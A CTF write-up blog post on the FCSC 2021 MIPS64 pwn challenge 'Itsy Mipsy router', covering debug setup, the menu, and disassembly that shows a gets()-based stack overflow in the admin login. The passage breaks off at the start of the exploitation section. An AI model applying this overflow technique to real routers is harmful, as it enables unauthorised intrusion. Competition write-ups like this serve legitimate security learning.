<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>[FCSC 2021 - pwn] Itsy Mipsy router | repr</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Itsy Mipsy Router (200 pts)Itsy Mipsy Router is a pwn challenge I did during the FCSC event.It’s not a very hard challenge but I found it very interesting because it was my first mips pwn challenge !">
<meta property="og:type" content="article">
<meta property="og:title" content="[FCSC 2021 - pwn] Itsy Mipsy router">
<meta property="og:url" content="https://n4sm.github.io/posts/mipsy/index.html">
<meta property="og:site_name" content="repr">
<meta property="og:description" content="Itsy Mipsy Router (200 pts)Itsy Mipsy Router is a pwn challenge I did during the FCSC event.It’s not a very hard challenge but I found it very interesting because it was my first mips pwn challenge !">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-05-03T00:00:00.000Z">
<meta property="article:modified_time" content="2023-09-05T09:45:11.052Z">
<meta property="article:author" content="nasm">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="nasm">
<meta property="article:tag" content="2021">
<meta property="article:tag" content="ret2school">
<meta property="article:tag" content="FCSC">
<meta property="article:tag" content="mipsy">
<meta property="article:tag" content="n4sm">
<meta property="article:tag" content="mips">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="repr" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/pic/wall.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>repr </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=https://cdn.discordapp.com/attachments/755522926819934349/1135933820852502589/chtholly_nota_seniorious_by_asukaln_dfhx63b-414w-2x.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">nasm </div>
      <div class="dot"></div>
      <div class="subtitle">pwn / kernel stuff </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com/nasm_re" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/n4sm" title="GitHub"><i class="fa-brands fa-github"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://ret2school.github.io/discord" title="Discord"><i class="fa-brands fa-discord"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box"></div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/posts/hello-world/" title="Hello World" >
            <div class="recent-link-text">
              Hello World
            </div>
          </a>
        
          <a class="recent-link" href="/posts/iwindow/" title="[ImaginaryCTF 2023 - pwn] window-of-opportunity" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] window-of-opportunity
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-mipsy" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        [FCSC 2021 - pwn] Itsy Mipsy router
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2021-05-03T00:00:00.000Z" itemprop="datePublished">2021-05-03</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/pwn/">pwn</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            3.8k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/2021/" rel="tag">2021</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/FCSC/" rel="tag">FCSC</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/mips/" rel="tag">mips</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/mipsy/" rel="tag">mipsy</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/n4sm/" rel="tag">n4sm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nasm/" rel="tag">nasm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ret2school/" rel="tag">ret2school</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h1 id="Itsy-Mipsy-Router-200-pts"><a href="#Itsy-Mipsy-Router-200-pts" class="headerlink" title="Itsy Mipsy Router (200 pts)"></a>Itsy Mipsy Router (200 pts)</h1><p>Itsy Mipsy Router is a pwn challenge I did during the <a target="_blank" rel="noopener" href="https://www.france-cybersecurity-challenge.fr/">FCSC event</a>.<br>It’s not a very hard challenge but I found it very interesting because it was my first mips pwn challenge !</p>
<h2 id="Setup"><a href="#Setup" class="headerlink" title="Setup"></a>Setup</h2><p>So basically we got this: </p>
<blockquote>
<p>On vous demander d’auditer un routeur à l’interface entre Internet et un réseau interne d’une entreprise. Le client vous demande si il est possible de lire les fichiers stockés sur la machine filer qui sert de serveur de fichiers HTTP.<br>nc challenges2.france-cybersecurity-challenge.fr 4005</p>
</blockquote>
<p>And for debugging purposes administrators provided a Docker file:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">FROM debian:buster-slim</span><br><span class="line">RUN apt update</span><br><span class="line">RUN apt install -yq socat qemu-user libc6-mips64-cross</span><br><span class="line">RUN apt clean</span><br><span class="line">RUN rm -rf /var/lib/apt/lists/</span><br><span class="line"></span><br><span class="line">WORKDIR /app</span><br><span class="line">COPY ./mipsy ./</span><br><span class="line">RUN rm /etc/ld.so.cache</span><br><span class="line"></span><br><span class="line">EXPOSE 4000</span><br><span class="line">EXPOSE 1234</span><br><span class="line">CMD socat tcp-listen:4000,reuseaddr,fork exec:&quot;qemu-mips64 -L /usr/mips64-linux-gnuabi64 ./mipsy&quot;</span><br></pre></td></tr></table></figure>
<p>So because it’s not very convenient to debug it from the docker I tried to run it directly on my host with a gdb stub on port 5445. I setup my host by installing the right packages, deleting <code>/etc/ld.so.cache</code> and by the socat command on port 4000: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$ uname -a</span><br><span class="line">Linux off 5.8.0-50-generic #56~20.04.1-Ubuntu SMP Mon Apr 12 21:46:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux</span><br><span class="line">$ sudo apt install socat qemu-user libc6-mips64-cross</span><br><span class="line">Lecture des listes de paquets... Fait</span><br><span class="line">Construction de l&#x27;arbre des dépendances       </span><br><span class="line">Lecture des informations d&#x27;état... Fait</span><br><span class="line">socat est déjà la version la plus récente (1.7.3.3-2).</span><br><span class="line">libc6-mips64-cross est déjà la version la plus récente (2.30-0ubuntu2cross2).</span><br><span class="line">qemu-user est déjà la version la plus récente (1:4.2-3ubuntu6.15).</span><br><span class="line">0 mis à jour, 0 nouvellement installés, 0 à enlever et 17 non mis à jour.</span><br><span class="line">$ sudo rm -f /etc/ld.so.cache</span><br><span class="line">$ socat tcp-listen:4000,reuseaddr,fork exec:&quot;qemu-mips64 -L /usr/mips64-linux-gnuabi64 -g 5445 ./mipsy&quot;</span><br></pre></td></tr></table></figure>
<p>We can debug the running process with gdb-multiarch (with the path of my pwndbg’s gdbinit to get an cleaner output).</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ gdb-multiarch -ex &#x27;source /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/Downloads/pwndbg/gdbinit.py&#x27; -q ./mipsy</span><br><span class="line">Reading symbols from ./mipsy...</span><br><span class="line">(No debugging symbols found in ./mipsy)</span><br><span class="line">pwndbg: loaded 196 commands. Type pwndbg [filter] for a list.</span><br><span class="line">pwndbg: created $rebase, $ida gdb functions (can be used with print/break)</span><br><span class="line">pwndbg&gt; target remote localhost:5445</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>To send the payload  I used <a target="_blank" rel="noopener" href="https://github.com/Gallopsled/pwntools">pwntools</a>.</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>():</span><br><span class="line">    <span class="comment"># return remote(&quot;challenges2.france-cybersecurity-challenge.fr&quot;, 4005)</span></span><br><span class="line">    <span class="keyword">return</span> remote(<span class="string">&quot;localhost&quot;</span>, <span class="number">4000</span>)</span><br><span class="line"></span><br><span class="line">io = start()</span><br><span class="line"><span class="built_in">print</span>(io.recvuntil(<span class="string">&quot;] &quot;</span>).decode(<span class="string">&#x27;utf-8&#x27;</span>))</span><br></pre></td></tr></table></figure>

<p>Now we launch the python script to trigger the socat:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ python3 wu.py                                                               </span><br><span class="line">[+] Opening connection to localhost on port 4000: Done</span><br></pre></td></tr></table></figure>

<p>It does not return anything because it breaks in the shared libraries I guess, so now we can continue the execution in gdb: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">Remote debugging using localhost:5445</span><br><span class="line">warning: Unable to find dynamic linker breakpoint function.</span><br><span class="line">GDB will be unable to debug shared library initializers</span><br><span class="line">and track explicitly loaded dynamic code.</span><br><span class="line">0x00000040008038d0 in ?? ()</span><br><span class="line">Could not check ASLR: Couldn&#x27;t get personality</span><br><span class="line">Downloading &#x27;/media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy&#x27; from the remote server: OK</span><br><span class="line">add-symbol-file /tmp/tmpsjb8mqsa/mipsy 0x120000000 -s .MIPS.abiflags 0x2400002e0 -s .MIPS.options 0x2400002f8 -s .note.gnu.build-id 0x240000870 -s .dynamic 0x240000898 -s .hash 0x240000aa8 -s .dynsym 0x240001190 -s .dynstr 0x240002858 -s .gnu.version 0x240003b12 -s .gnu.version_r 0x240003cf8 -s .rel.dyn 0x240003d38 -s .init 0x240003d58 -s .text 0x240003de0 -s .MIPS.stubs 0x2400257a0 -s .fini 0x2400259c0 -s .rodata 0x240025a10 -s .interp 0x24002d280 -s .eh_frame_hdr 0x24002d290 -s .eh_frame 0x24002d2a8 -s .note.ABI-tag 0x24002d2e0 -s .ctors 0x24003df58 -s .dtors 0x24003df68 -s .data.rel.ro 0x24003df78 -s .data 0x240040000 -s .rld_map 0x240040020 -s .got 0x240040030 -s .sdata 0x240040840 -s .bss 0x240040850</span><br><span class="line">&#x27;context&#x27;: Print out the current register, instruction, and stack context.</span><br><span class="line">Exception occurred: context: unsupported operand type(s) for +: &#x27;NoneType&#x27; and &#x27;int&#x27; (&lt;class &#x27;TypeError&#x27;&gt;)</span><br><span class="line">For more info invoke `set exception-verbose on` and rerun the command</span><br><span class="line">or debug it by yourself with `set exception-debugger on`</span><br><span class="line">pwndbg&gt; vmmap</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">       0x120000000        0x12002e000 r-xp    2e000 0      /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy</span><br><span class="line">       0x12002e000        0x12003d000 ---p     f000 2d000  /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy</span><br><span class="line">       0x12003d000        0x120040000 r--p     3000 2d000  /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy</span><br><span class="line">       0x120040000        0x120043000 rw-p     3000 30000  /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy</span><br><span class="line">      0x4000403000       0x4000828000 r--p   425000 0      &lt;explored&gt;</span><br><span class="line">      0x40007fe000       0x4000801000 rw-p     3000 0      [stack]</span><br><span class="line"></span><br><span class="line">[QEMU target detected - vmmap result might not be accurate; see `help vmmap`]</span><br><span class="line">pwndbg&gt; continue</span><br><span class="line">Continuing.</span><br><span class="line">warning: Could not load shared library symbols for 2 libraries, e.g. /lib/libc.so.6.</span><br><span class="line">Use the &quot;info sharedlibrary&quot; command to see the complete listing.</span><br><span class="line">Do you need &quot;set solib-search-path&quot; or &quot;set sysroot&quot;?</span><br><span class="line">[Inferior 1 (process 1) exited normally]</span><br></pre></td></tr></table></figure>

<p>The process exited because we didn’t inserted any breakpoints and so our python script outs this: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">+---------------------------------+</span><br><span class="line">|/                               \|</span><br><span class="line">|        ITSY MIPSY ROUTER        |</span><br><span class="line">|\                               /|</span><br><span class="line">+---------------------------------+</span><br><span class="line"></span><br><span class="line">Menu:</span><br><span class="line">  0. Quit.</span><br><span class="line">  1. Show network interfaces</span><br><span class="line">  2. Ping internal HTTP file server</span><br><span class="line">  3. Log in as admin</span><br><span class="line"></span><br><span class="line">[guest@mipsy] </span><br></pre></td></tr></table></figure>

<p>We’re able to debug properly our process !</p>
<h2 id="Reverse-Engineering"><a href="#Reverse-Engineering" class="headerlink" title="Reverse Engineering"></a>Reverse Engineering</h2><p>We can take a look at the binary by running the file command:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ file mipsy                                                                  </span><br><span class="line">mipsy: ELF 64-bit MSB executable, MIPS, MIPS64 rel2 version 1 (SYSV), dynamically linked, interpreter /lib64/ld.so.1, BuildID[sha1]=e20cf7872e96482095ce68e6d4d03806d5928de4, for GNU/Linux 3.2.0, not stripped</span><br></pre></td></tr></table></figure>
<p>So it’s a mips64 big endian binary dynamically linked. As we see above, the program is asking for an input among 4 options: Quit, Show network interfaces, Ping internal HTTP file server and Login as admin. We can test these options remotely:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">+---------------------------------+</span><br><span class="line">|/                               \|</span><br><span class="line">|        ITSY MIPSY ROUTER        |</span><br><span class="line">|\                               /|</span><br><span class="line">+---------------------------------+</span><br><span class="line"></span><br><span class="line">Menu:</span><br><span class="line">  0. Quit.</span><br><span class="line">  1. Show network interfaces</span><br><span class="line">  2. Ping internal HTTP file server</span><br><span class="line">  3. Log in as admin</span><br><span class="line"></span><br><span class="line">[guest@mipsy] $ 1</span><br><span class="line">The router has the following network interfaces:</span><br><span class="line">* lo</span><br><span class="line">* eth0</span><br><span class="line">* eth2</span><br><span class="line">* eth1</span><br><span class="line"></span><br><span class="line">Menu:</span><br><span class="line">  0. Quit.</span><br><span class="line">  1. Show network interfaces</span><br><span class="line">  2. Ping internal HTTP file server</span><br><span class="line">  3. Log in as admin</span><br><span class="line"></span><br><span class="line">[guest@mipsy] $ 2</span><br><span class="line">Success: HTTP file server is up!</span><br><span class="line"></span><br><span class="line">Menu:</span><br><span class="line">  0. Quit.</span><br><span class="line">  1. Show network interfaces</span><br><span class="line">  2. Ping internal HTTP file server</span><br><span class="line">  3. Log in as admin</span><br><span class="line"></span><br><span class="line">[guest@mipsy] $ 3</span><br><span class="line">Input your password:</span><br><span class="line">&gt;&gt;&gt; l3eT_p4sS</span><br><span class="line">Error: wrong password.</span><br><span class="line"></span><br><span class="line">Menu:</span><br><span class="line">  0. Quit.</span><br><span class="line">  1. Show network interfaces</span><br><span class="line">  2. Ping internal HTTP file server</span><br><span class="line">  3. Log in as admin</span><br><span class="line"></span><br><span class="line">[guest@mipsy] $ 0</span><br></pre></td></tr></table></figure>
<p>It doesn’t give any interesting informations so instead of fuzzing manually the binary to find the vulnerability, I reversed the main functions in IDA. And particulary the code of the the function corresponding to the “Login as admin” feature. The assembly code of this function looks like such:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">.globl authenticate</span><br><span class="line">authenticate:</span><br><span class="line"></span><br><span class="line">var_40= -0x40</span><br><span class="line">var_18= -0x18</span><br><span class="line">var_10= -0x10</span><br><span class="line">ret_addr= -8</span><br><span class="line"></span><br><span class="line">daddiu  $sp, -0x90       ; Doubleword Add Immediate Unsigned</span><br><span class="line">sd      $ra, 0x90+ret_addr($sp)  ; Store Doubleword</span><br><span class="line">sd      $fp, 0x90+var_10($sp)  ; Store Doubleword</span><br><span class="line">sd      $gp, 0x90+var_18($sp)  ; Store Doubleword</span><br><span class="line">move    $fp, $sp</span><br><span class="line">lui     $gp, 4           ; Load Upper Immediate</span><br><span class="line">daddu   $gp, $t9         ; Doubleword Add Unsigned</span><br><span class="line">daddiu  $gp, 0x3AA4      ; Doubleword Add Immediate Unsigned</span><br><span class="line">dli     $v0, 0x120020000  ; Doubleword Load Immediate</span><br><span class="line">daddiu  $a0, $v0, (aInputYourPassw - 0x120020000)  ; &quot;Input your password:&quot;</span><br><span class="line">dla     $v0, puts        ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">jalr    $t9 ; puts       ; Jump And Link Register</span><br><span class="line">nop</span><br><span class="line">dli     $v0, 0x120020000  ; Doubleword Load Immediate</span><br><span class="line">daddiu  $a0, $v0, (asc_120025B00 - 0x120020000)  ; &quot;&gt;&gt;&gt; &quot;</span><br><span class="line">dla     $v0, printf      ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">jalr    $t9 ; printf     ; Jump And Link Register</span><br><span class="line">nop</span><br><span class="line">dla     $v0, stdout      ; Load 64-bit address</span><br><span class="line">ld      $v0, (stdout - 0x120042BC8)($v0)  ; Load Doubleword</span><br><span class="line">move    $a0, $v0         ; stream</span><br><span class="line">dla     $v0, fflush      ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">jalr    $t9 ; fflush     ; Jump And Link Register</span><br><span class="line">nop</span><br><span class="line">move    $a0, $fp</span><br><span class="line">dla     $v0, gets        ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">jalr    $t9 ; gets       ; Jump And Link Register</span><br><span class="line">nop</span><br><span class="line">daddiu  $v0, $fp, 0x50   ; Doubleword Add Immediate Unsigned</span><br><span class="line">li      $a2, 0x20  ; &#x27; &#x27;  ; n</span><br><span class="line">move    $a1, $zero       ; c</span><br><span class="line">move    $a0, $v0         ; s</span><br><span class="line">dla     $v0, memset      ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">jalr    $t9 ; memset     ; Jump And Link Register</span><br><span class="line">nop</span><br><span class="line">move    $a0, $fp         ; s</span><br><span class="line">dla     $v0, strlen      ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">jalr    $t9 ; strlen     ; Jump And Link Register</span><br><span class="line">nop</span><br><span class="line">daddiu  $v1, $fp, 0x50   ; Doubleword Add Immediate Unsigned</span><br><span class="line">move    $a2, $v1</span><br><span class="line">move    $a1, $v0</span><br><span class="line">move    $a0, $fp</span><br><span class="line">dla     $v0, kdf         ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">bal     kdf              ; Branch Always and Link</span><br><span class="line">nop</span><br><span class="line">daddiu  $v1, $fp, 0x50   ; Doubleword Add Immediate Unsigned</span><br><span class="line">li      $a2, 0x20  ; &#x27; &#x27;  ; n</span><br><span class="line">dli     $v0, 0x120020000  ; Doubleword Load Immediate</span><br><span class="line">daddiu  $a1, $v0, (unk_120025B08 - 0x120020000)  ; s2</span><br><span class="line">move    $a0, $v1         ; s1</span><br><span class="line">dla     $v0, memcmp      ; Load 64-bit address</span><br><span class="line">move    $t9, $v0</span><br><span class="line">jalr    $t9 ; memcmp     ; Jump And Link Register</span><br><span class="line">nop</span><br><span class="line">bnez    $v0, loc_120004688  ; Branch on Not Zero</span><br></pre></td></tr></table></figure>
<p>When I began this challenge I didn’t know anything about mips64 assembly but thanks to auto comments in IDA and to <a target="_blank" rel="noopener" href="http://math-atlas.sourceforge.net/devel/assembly/mips-iv.pdf">this</a> and <a target="_blank" rel="noopener" href="https://write.lain.faith/~/Haskal/mips-rop/">this</a>, I understood very quickly the main components of the architecture. And that’s why I noticed a call to the <code>gets</code> function which as it’s known read an arbitrary number of bytes from stdin to the buffer indicated in argument, and so in our case in <code>$fp</code>, which is initialized to <code>$sp-0x90</code>. Next the call to <code>gets</code>, <code>printf</code> and <code>fflush</code>, it calls <code>memset</code> to set every bytes of another buffer allocated next to our input to zero. Then it computes the length of our input and calls the <code>kdf</code> function with the following arguments: <code>kdf(char *input_password, int input_length, unsigned char *out)</code>. The kdf function is basically doing some encryption operations according to our input and its length and stores the result in the third argument.<br>And the result of this encryption routine is compared to a constant value with <code>memcmp</code>.</p>
<p>So we discovered the stack based buffer overflow which allows us to overwrite the saved instruction pointer saved at the functions’s prologue.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>Since we understood the vulnerable function, we can represent the stackframe like that: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$saved_fp-0x90+----------------------+</span><br><span class="line">              |                      |</span><br><span class="line">              |                      |</span><br><span class="line">              |   buffer_password    |</span><br><span class="line">              |                      |</span><br><span class="line">              |                      |</span><br><span class="line">$saved_fp-0x40+----------------------+</span><br><span class="line">              |                      |</span><br><span 